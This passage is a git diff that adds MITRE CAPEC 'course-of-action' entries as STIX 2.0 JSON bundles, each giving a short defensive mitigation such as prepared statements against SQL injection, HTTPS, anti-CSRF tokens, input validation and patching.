b/capec/course-of-action/course-of-action--05bdf3fe-3618-4cd4-be74-e241a23c1df8.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a33f3041-7b00-4656-86af-3e1243390241", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--05bdf3fe-3618-4cd4-be74-e241a23c1df8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-493-0", + "description": "Enforce strict schema validation. The schema should enforce a maximum number of array elements. If the number of maximum array elements can't be limited another validation method should be used. One such method could be comparing the declared number of items in the array with the existing number of elements of the array. If these numbers don't match drop the SOAP packet at the web service layer.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--060932fa-a809-49e7-9a4c-05e6c3f99f31.json b/capec/course-of-action/course-of-action--060932fa-a809-49e7-9a4c-05e6c3f99f31.json new file mode 100644 index 0000000000..09457577b7 --- /dev/null +++ b/capec/course-of-action/course-of-action--060932fa-a809-49e7-9a4c-05e6c3f99f31.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--1b03f9a2-e950-484a-9d56-91301994c54e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--060932fa-a809-49e7-9a4c-05e6c3f99f31", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-125-1", + "description": "Specify expectations for capabilities and dictate which behaviors are acceptable when resource allocation reaches limits.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--061b49b1-f4f3-4237-80b2-fa402ab9054d.json b/capec/course-of-action/course-of-action--061b49b1-f4f3-4237-80b2-fa402ab9054d.json new file mode 100644 index 0000000000..02ef02fa1b --- /dev/null +++ b/capec/course-of-action/course-of-action--061b49b1-f4f3-4237-80b2-fa402ab9054d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--fc96feec-91b5-492f-82a8-873581e35801", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--061b49b1-f4f3-4237-80b2-fa402ab9054d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-243-1", + "description": "Implementation: Normalize, filter and white list all input including that which is not expected to have any scripting content.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0698a7f6-d186-4417-93dc-f31e7ca1d81b.json b/capec/course-of-action/course-of-action--0698a7f6-d186-4417-93dc-f31e7ca1d81b.json new file mode 100644 index 0000000000..0e5d04377e --- /dev/null +++ b/capec/course-of-action/course-of-action--0698a7f6-d186-4417-93dc-f31e7ca1d81b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c0525367-014f-4af1-8edf-ded575bb24a8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0698a7f6-d186-4417-93dc-f31e7ca1d81b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-45-1", + "description": "Because Symlink can be modified by an attacker, make sure that the ones you read are located in protected directories.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--06ab084b-21a7-425f-8046-f2bcdb3d5d69.json b/capec/course-of-action/course-of-action--06ab084b-21a7-425f-8046-f2bcdb3d5d69.json new file mode 100644 index 0000000000..0abb8a855e --- /dev/null +++ b/capec/course-of-action/course-of-action--06ab084b-21a7-425f-8046-f2bcdb3d5d69.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f41e6774-beb8-474c-82b0-07a3a489f79f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--06ab084b-21a7-425f-8046-f2bcdb3d5d69", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-110-1", + "description": "Ensure that prepared statements or other mechanism that enables parameter binding is used when accessing the database in a way that would prevent the attackers' supplied data from controlling the structure of the executed query.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--06cabbce-d4a4-4040-8bb9-9d2d6e4efcd5.json b/capec/course-of-action/course-of-action--06cabbce-d4a4-4040-8bb9-9d2d6e4efcd5.json new file mode 100644 index 0000000000..a6fd599cca --- /dev/null +++ b/capec/course-of-action/course-of-action--06cabbce-d4a4-4040-8bb9-9d2d6e4efcd5.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c4e12a10-f3a3-484e-9bff-279b42a6292b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--06cabbce-d4a4-4040-8bb9-9d2d6e4efcd5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-499-0", + "description": "To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. Implicit intents should never be used for inter-application communication.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--06ed9958-72eb-4866-9e5e-9bd8c0b19eaf.json b/capec/course-of-action/course-of-action--06ed9958-72eb-4866-9e5e-9bd8c0b19eaf.json new file mode 100644 index 0000000000..c53a1ea4c9 --- /dev/null +++ b/capec/course-of-action/course-of-action--06ed9958-72eb-4866-9e5e-9bd8c0b19eaf.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2c6468d5-ecbb-4434-8a51-7ca1fd472433", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--06ed9958-72eb-4866-9e5e-9bd8c0b19eaf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-102-0", + "description": "Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0783cd89-b8b3-4aab-9755-23328a4742a1.json b/capec/course-of-action/course-of-action--0783cd89-b8b3-4aab-9755-23328a4742a1.json new file mode 100644 index 0000000000..d01a25c635 --- /dev/null +++ b/capec/course-of-action/course-of-action--0783cd89-b8b3-4aab-9755-23328a4742a1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--38d023aa-2792-475c-b6b0-a8668bee50d4", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0783cd89-b8b3-4aab-9755-23328a4742a1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-121-0", + "description": "Ensure that production systems to not contain sample or test APIs and that these APIs are only used in development environments.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--07a0e5e3-0911-4ece-a705-32ff4a2b913b.json b/capec/course-of-action/course-of-action--07a0e5e3-0911-4ece-a705-32ff4a2b913b.json new file mode 100644 index 0000000000..5505edefb3 --- /dev/null +++ b/capec/course-of-action/course-of-action--07a0e5e3-0911-4ece-a705-32ff4a2b913b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--74889b24-1c31-49db-8143-5cb4a7a7a6eb", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--07a0e5e3-0911-4ece-a705-32ff4a2b913b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-39-2", + "description": "Make sure that all session tokens use a good source of randomness", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--07c1f1b1-4d7e-47e9-84dc-7fa4fad4772d.json b/capec/course-of-action/course-of-action--07c1f1b1-4d7e-47e9-84dc-7fa4fad4772d.json new file mode 100644 index 0000000000..8fcc7572da --- /dev/null +++ b/capec/course-of-action/course-of-action--07c1f1b1-4d7e-47e9-84dc-7fa4fad4772d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c0990b23-a1ac-4276-8d24-2d788e9cca87", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--07c1f1b1-4d7e-47e9-84dc-7fa4fad4772d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-26-2", + "description": "Use synchronization to control the flow of execution.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--07e21b68-7c17-480a-88fb-094ddecb93bc.json b/capec/course-of-action/course-of-action--07e21b68-7c17-480a-88fb-094ddecb93bc.json new file mode 100644 index 0000000000..ae039b158d --- /dev/null +++ b/capec/course-of-action/course-of-action--07e21b68-7c17-480a-88fb-094ddecb93bc.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f96ae4c6-370e-420d-93b4-dc88001e6c4f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--07e21b68-7c17-480a-88fb-094ddecb93bc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "coa-468-0", + "description": "\n Design: Prior to performing CSS parsing, require the CSS to start with well-formed CSS when it is a cross-domain load and the MIME type is broken. This is a browser level fix.\n Implementation: Perform proper HTML encoding and URL escaping\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--083b142c-0281-4135-bf8d-cb4a55bda94e.json b/capec/course-of-action/course-of-action--083b142c-0281-4135-bf8d-cb4a55bda94e.json new file mode 100644 index 0000000000..5994a68280 --- /dev/null +++ b/capec/course-of-action/course-of-action--083b142c-0281-4135-bf8d-cb4a55bda94e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d2113c79-72f0-478c-8ec1-3f9a469eb324", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--083b142c-0281-4135-bf8d-cb4a55bda94e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-142-0", + "description": "Configuration: Make sure your DNS servers have been updated to the latest versions", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--085071c4-d704-47be-85af-ebcd54320914.json b/capec/course-of-action/course-of-action--085071c4-d704-47be-85af-ebcd54320914.json new file mode 100644 index 0000000000..8c2cfe6adb --- /dev/null +++ b/capec/course-of-action/course-of-action--085071c4-d704-47be-85af-ebcd54320914.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--39d6920d-f8b8-4135-968b-0d7de9345669", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--085071c4-d704-47be-85af-ebcd54320914", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-26-4", + "description": "Pay attention to concurrency problems related to the access of resources.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--08b77aa6-1eca-464a-9bd0-5286743a84a4.json b/capec/course-of-action/course-of-action--08b77aa6-1eca-464a-9bd0-5286743a84a4.json new file mode 100644 index 0000000000..d157e50196 --- /dev/null +++ b/capec/course-of-action/course-of-action--08b77aa6-1eca-464a-9bd0-5286743a84a4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--cde6863b-614a-4adb-97ae-f575b26bbc17", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--08b77aa6-1eca-464a-9bd0-5286743a84a4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-19-8", + "description": "Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--093ab972-dc69-4e9d-bafd-38856e65b3d8.json b/capec/course-of-action/course-of-action--093ab972-dc69-4e9d-bafd-38856e65b3d8.json new file mode 100644 index 0000000000..ae137b8bc1 --- /dev/null +++ b/capec/course-of-action/course-of-action--093ab972-dc69-4e9d-bafd-38856e65b3d8.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c0859a45-2520-421d-b961-2c11c10c6427", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--093ab972-dc69-4e9d-bafd-38856e65b3d8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-588-1", + "description": "Utilize proper character encoding for all output produced within client-site scripts manipulating the DOM.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0a3d01e6-7188-42fb-aa3c-b73906334bce.json b/capec/course-of-action/course-of-action--0a3d01e6-7188-42fb-aa3c-b73906334bce.json new file mode 100644 index 0000000000..287666c194 --- /dev/null +++ b/capec/course-of-action/course-of-action--0a3d01e6-7188-42fb-aa3c-b73906334bce.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9e89f4ca-cf18-462f-9597-781e4377a902", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0a3d01e6-7188-42fb-aa3c-b73906334bce", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-62-0", + "description": "Use cryptographic tokens to associate a request with a specific action. The token can be regenerated at every request so that if a request with an invalid token is encountered, it can be reliably discarded. The token is considered invalid if it arrived with a request other than the action it was supposed to be associated with.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0ad6da2b-80f2-47f6-a445-059173eb3363.json b/capec/course-of-action/course-of-action--0ad6da2b-80f2-47f6-a445-059173eb3363.json new file mode 100644 index 0000000000..e6aa1ab609 --- /dev/null +++ b/capec/course-of-action/course-of-action--0ad6da2b-80f2-47f6-a445-059173eb3363.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c4985fae-69d1-488e-b44e-46d0f12ba743", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0ad6da2b-80f2-47f6-a445-059173eb3363", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-247-1", + "description": "Implementation: Normalize, filter and white list any input that will be included in any subsequent web pages or back end operations.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0ae70d35-18dd-46fc-9e02-744c0c6ee444.json b/capec/course-of-action/course-of-action--0ae70d35-18dd-46fc-9e02-744c0c6ee444.json new file mode 100644 index 0000000000..5572ce29bc --- /dev/null +++ b/capec/course-of-action/course-of-action--0ae70d35-18dd-46fc-9e02-744c0c6ee444.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f1ac0a9a-9dfc-4846-a6ab-dc52995c470e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0ae70d35-18dd-46fc-9e02-744c0c6ee444", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-3-0", + "description": "Perform white list rather than black list input validation.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0b1d3e9d-f2a7-4762-8047-d770b6172d7c.json b/capec/course-of-action/course-of-action--0b1d3e9d-f2a7-4762-8047-d770b6172d7c.json new file mode 100644 index 0000000000..02200bd7b0 --- /dev/null +++ b/capec/course-of-action/course-of-action--0b1d3e9d-f2a7-4762-8047-d770b6172d7c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b9faeb2c-4a31-4b82-a219-627a72931453", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0b1d3e9d-f2a7-4762-8047-d770b6172d7c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-50-2", + "description": "Ensure that your password recovery functionality is not vulnerable to an injection style attack.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0b3b5c92-65ea-4083-aaaf-95a22c6597cb.json b/capec/course-of-action/course-of-action--0b3b5c92-65ea-4083-aaaf-95a22c6597cb.json new file mode 100644 index 0000000000..1678bc1f4e --- /dev/null +++ b/capec/course-of-action/course-of-action--0b3b5c92-65ea-4083-aaaf-95a22c6597cb.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7998eff6-9205-45b0-98f2-c63c52312d88", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0b3b5c92-65ea-4083-aaaf-95a22c6597cb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-9-5", + "description": "Apply the latest patches to your user exposed services. This may not be a complete solution, especially against a zero day attack.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0b8e6f93-072a-40f9-b438-9618b0494301.json b/capec/course-of-action/course-of-action--0b8e6f93-072a-40f9-b438-9618b0494301.json new file mode 100644 index 0000000000..3eb4c03179 --- /dev/null +++ b/capec/course-of-action/course-of-action--0b8e6f93-072a-40f9-b438-9618b0494301.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8e93edd2-08a0-48ee-9339-d0ded585cd87", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0b8e6f93-072a-40f9-b438-9618b0494301", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-66-2", + "description": "Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0c3b87ec-c44e-467b-8066-ee96dfcdfc80.json b/capec/course-of-action/course-of-action--0c3b87ec-c44e-467b-8066-ee96dfcdfc80.json new file mode 100644 index 0000000000..1ed788004d --- /dev/null +++ b/capec/course-of-action/course-of-action--0c3b87ec-c44e-467b-8066-ee96dfcdfc80.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--92f8386b-25c5-4b62-980b-31dcc9025c55", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0c3b87ec-c44e-467b-8066-ee96dfcdfc80", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-216-0", + "description": "Encrypt all sensitive communications using properly-configured cryptography.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0ca911eb-ac2a-473f-92a6-64e6cc63b937.json b/capec/course-of-action/course-of-action--0ca911eb-ac2a-473f-92a6-64e6cc63b937.json new file mode 100644 index 0000000000..67d1325c7b --- /dev/null +++ b/capec/course-of-action/course-of-action--0ca911eb-ac2a-473f-92a6-64e6cc63b937.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--016904e8-704c-4f83-a51a-9940060c6473", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0ca911eb-ac2a-473f-92a6-64e6cc63b937", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "coa-498-0", + "description": "To mitigate this type of an attack, an application that may display sensitive information should clear the screen contents before a screenshot is taken. This can be accomplished by setting the key window's hidden property to YES. This code to hide the contents should be placed in both the applicationWillResignActive() and applicationDidEnterBackground() methods.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0cc989fe-e338-41db-8c57-5824d3cc66ec.json b/capec/course-of-action/course-of-action--0cc989fe-e338-41db-8c57-5824d3cc66ec.json new file mode 100644 index 0000000000..76c175e7a8 --- /dev/null +++ b/capec/course-of-action/course-of-action--0cc989fe-e338-41db-8c57-5824d3cc66ec.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--21d10452-989b-4223-935e-c54abb8069f7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0cc989fe-e338-41db-8c57-5824d3cc66ec", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-157-0", + "description": "Encrypt sensitive information when transmitted on insecure mediums to prevent interception.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0d6a011b-a753-49c9-9e5d-1a8a67c60cf5.json b/capec/course-of-action/course-of-action--0d6a011b-a753-49c9-9e5d-1a8a67c60cf5.json new file mode 100644 index 0000000000..682d653a9d --- /dev/null +++ b/capec/course-of-action/course-of-action--0d6a011b-a753-49c9-9e5d-1a8a67c60cf5.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--128e44ec-8d9c-4cca-b2e8-e75190a09318", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0d6a011b-a753-49c9-9e5d-1a8a67c60cf5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-41-1", + "description": "Implementation: Implement email filtering solutions on mail server or on MTA, relay server.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0d786130-47ff-416a-9a8b-aafbccdd7e07.json b/capec/course-of-action/course-of-action--0d786130-47ff-416a-9a8b-aafbccdd7e07.json new file mode 100644 index 0000000000..bea5ef65fe --- /dev/null +++ b/capec/course-of-action/course-of-action--0d786130-47ff-416a-9a8b-aafbccdd7e07.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--09b4c2ba-4fd9-4420-a0ea-ca76976d4230", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0d786130-47ff-416a-9a8b-aafbccdd7e07", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-496-0", + "description": "This attack may be mitigated through egress filtering based on ICMP payload so a network is a \"good neighbor\" to other networks. Bad IP implementations become patched, so using the proper version of a browser or OS is recommended.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0d9c19f1-20dd-4569-afb6-edbc667c16b1.json b/capec/course-of-action/course-of-action--0d9c19f1-20dd-4569-afb6-edbc667c16b1.json new file mode 100644 index 0000000000..25a82c74cb --- /dev/null +++ b/capec/course-of-action/course-of-action--0d9c19f1-20dd-4569-afb6-edbc667c16b1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--cb968b6f-c30d-410a-af46-f945e24d66f0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0d9c19f1-20dd-4569-afb6-edbc667c16b1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-75-2", + "description": "Implementation: Integrity monitoring for configuration files", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0e2f45e3-d988-4da1-a19f-202c51c40a0f.json b/capec/course-of-action/course-of-action--0e2f45e3-d988-4da1-a19f-202c51c40a0f.json new file mode 100644 index 0000000000..72a02f89b9 --- /dev/null +++ b/capec/course-of-action/course-of-action--0e2f45e3-d988-4da1-a19f-202c51c40a0f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e3a85741-ce7d-482f-a267-ecf50b90a5f6", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0e2f45e3-d988-4da1-a19f-202c51c40a0f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-95-3", + "description": "Pay attention to the function naming convention (within the WSDL interface). Easy to guess function name may be an entry point for attack.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0e44c49a-a553-4aaf-81b5-3a5d77a541e7.json b/capec/course-of-action/course-of-action--0e44c49a-a553-4aaf-81b5-3a5d77a541e7.json new file mode 100644 index 0000000000..9816582c27 --- /dev/null +++ b/capec/course-of-action/course-of-action--0e44c49a-a553-4aaf-81b5-3a5d77a541e7.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0c0fb7ae-b9f4-4d53-84e3-a5bbae09c4cb", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0e44c49a-a553-4aaf-81b5-3a5d77a541e7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-94-1", + "description": "Encrypt your communication using cryptography (SSL,...)", + "object_marking_refs": [ + 